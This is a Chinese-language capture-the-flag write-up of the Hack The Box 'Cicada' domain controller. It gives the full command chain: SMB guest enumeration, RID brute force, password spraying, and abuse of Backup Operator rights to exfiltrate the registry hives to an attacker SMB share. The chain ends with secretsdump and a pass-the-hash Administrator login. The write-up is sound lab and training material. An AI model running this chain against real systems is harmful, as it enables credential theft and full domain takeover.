主機偵查
端口掃描
利用 nmap 對目標主機進行掃描,得知目標主機的作業系統是 Windows 而且開啟了 Kerberos 服務、DNS 服務與 LDAP 服務等,判斷其為網域控制器。
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/Cicada/results/cicada.htb/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/Cicada/results/cicada.htb/scans/xml/_quick_tcp_nmap.xml cicada.htb

SMB 服務偵查
透過 SMBMap 掃描目標主機的網路磁碟。
smbmap -u "guest" -p "" -P 445 -H cicada.htb

其中, //cicada.htb/HR 中有一個文字檔,顯示預設密碼為 Cicada$M6Corpb*@Lp#nZp!8 。

以訪客身份利用 netexec 近一步列舉所有使用者。
netexec smb 10.129.23.230 -u guest -p '' --rid-brute > users.txt

從中擷取有效的使用者清單。
cat users.txt | grep SidTypeUser | cut -d \\ -f 2 | cut -d ' ' -f 1 > valid_users.txt

初始存取權
透過密碼噴灑攻擊,來確認哪個使用者使用了預設密碼。
crackmapexec smb cicada.htb --port=445 -u "/home/kali/HTB/Cicada/valid_users.txt" -p "/home/kali/HTB/Cicada/password.txt"

此使用者可以存取 //cicada.htb/DEV ,登入後發現一個備份用的腳本。

腳本內容記有 emily.oscars 的明文密碼。

提升權限
AD 偵查
透過 bloodhound 列舉得知, emily.oscars 屬於 Backup Operator 群組,擁有任意存取目標系統檔案和註冊表的權限。

密碼破解
開啟一個 smb 伺服器,利用 emily.oscars 的權限將目標系統的 SAM Hive 全部備份回 smb 伺服器。
impacket-smbserver share . -smb2support
impacket-reg 'cicada.htb/emily.oscars':'Q!3@Lp#M6b*7t*Vt'@10.129.23.230 backup -o '\\10.10.16.5\share'

利用 secretsdump.py 離線解析 SAM Hive ,可以獲得所有使用者的 NTLM Hash。
impacket-secretsdump LOCAL -system SYSTEM.save -security SECURITY.save -sam SAM.save

Pass-The-Hash
利用 psexec.py 進行 Pass-The-Hash 登入 Administrator 成功獲得 flag 。
impacket-psexec cicada.htb/administrator@10.129.23.230 -hashes aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341
